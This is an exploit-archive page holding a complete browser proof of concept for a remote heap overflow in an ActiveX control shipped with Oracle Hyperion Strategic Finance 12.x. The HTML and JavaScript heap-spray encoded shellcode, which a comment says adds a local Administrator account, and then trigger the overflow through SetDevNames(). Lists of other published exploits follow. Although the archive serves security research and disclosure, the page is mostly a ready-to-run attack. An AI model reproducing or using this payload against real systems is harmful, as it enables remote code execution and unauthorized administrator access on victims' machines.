Menu

Search for hundreds of thousands of exploits

"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow"

Author

Exploit author

rgod

Platform

Exploit platform

windows

Release date

Exploit published date

2011-11-07

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
<!-- 
Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One 
WorkBook OLE Control TTF16 (6.3.5 Build 1) SetDevNames() Remote Heap Overflow poc
99% stable,IE-no-dep. I think this control can be carried by other products, 
however 6.1 seems not vulnerable
A copy of heapLib can be found here: http://retrogod.altervista.org/heapLib_js.html
ActiveX Settings:
Binary path: C:\WINDOWS\system32\TTF16.ocx
CLSID: {B0475003-7740-11D1-BDC3-0020AF9F8E6E}
ProgID: TTF161.TTF1.6
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

Andrea Micalizzi aka rgod
--!>
<!-- saved from url=(0014)about:internet --> 
<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<SCRIPT src="heapLib.js"></SCRIPT>
</head>
<body>
<object classid='clsid:B0475003-7740-11D1-BDC3-0020AF9F8E6E' id='obj' width=640 height=480/>
</object>
<SCRIPT>
var finalsize = 1200;
var final = '';
var heap = null;
var curr = 0;
function x() {	
  heap = new heapLib.ie(0x20000);
  var heapspray = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + //add Administrator, user: sun, pass: tzu
                     "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
                     "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
                     "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
                     "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
                     "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
                     "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
                     "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
                     "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
                     "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
                     "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
                     "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
                     "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
                     "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
                     "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
                     "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
                     "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
                     "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
                     "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
                     "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
                     "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
                     "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
                     "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
                     "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
                     "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
                     "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
                     "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
                     "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
                     "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
                     "%u7734%u4734%u4570");   
while(heapspray.length < 0x500) heapspray += unescape("%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606");
  var heapblock = heapspray;
  while(heapblock.length < 0x40000) heapblock += heapblock;
  final = heapblock.substring(2, 0x40000 - 0x21);
  if(curr < 120) {
  	spray();
  }
}

function spray() {
  if(curr < finalsize - 1) {
    for(var i = 0; i < 120; i++) {
      heap.alloc(final);
      curr++;
    }
    }  

}
</script>
<script language='javascript' defer=defer>
x();
var x ="";
for (m=0;m<90;m++){x = x  + unescape("%u0606%u0606");}
try{
    obj.SetDevNames(x,"",""); //don't touch
    obj.SetDevNames(x,x,"");
    obj.SetDevNames(x,x,x);
}
catch(e){
}
obj.SetDevNames(x,x,"");
</script>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2013-12-11 "EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution" remote windows rgod
2013-10-04 "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution" remote php rgod
2013-05-26 "SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution" remote windows rgod
2013-05-26 "SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution" dos windows rgod
2013-01-07 "Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)" dos windows rgod
2012-11-15 "Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution" remote windows rgod
2012-11-15 "Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution" remote windows rgod
2012-08-07 "Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution" remote windows rgod
2012-08-07 "Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion" remote windows rgod
2012-08-06 "AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution" dos windows rgod
2012-05-11 "Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow" local windows rgod
2012-04-30 "McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution" remote windows rgod
2012-04-05 "Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite" remote windows rgod
2012-04-05 "Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite" remote windows rgod
2012-03-28 "TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow" remote hardware rgod
2012-03-28 "Quest InTrust 10.4.x - ReportTree / SimpleTree Classes" remote windows rgod
2012-03-28 "D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow" remote hardware rgod
2012-03-28 "Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution" remote windows rgod
2012-03-22 "Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)" dos windows rgod
2012-03-22 "Google Talk - 'gtalk://' Deprecated URI Handler Injection" remote windows rgod
2012-03-19 "2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute" remote windows rgod
2012-03-19 "LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion" remote windows rgod
2012-03-19 "Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow" remote windows rgod
2012-03-19 "ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Directory Traversal" webapps jsp rgod
2012-03-19 "LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution" remote windows rgod
2012-03-19 "2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite" remote windows rgod
2011-11-07 "Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow" remote windows rgod
2011-11-02 "Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution" remote windows rgod
2011-10-31 "Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)" dos windows rgod
2011-10-24 "Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method" remote windows rgod 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected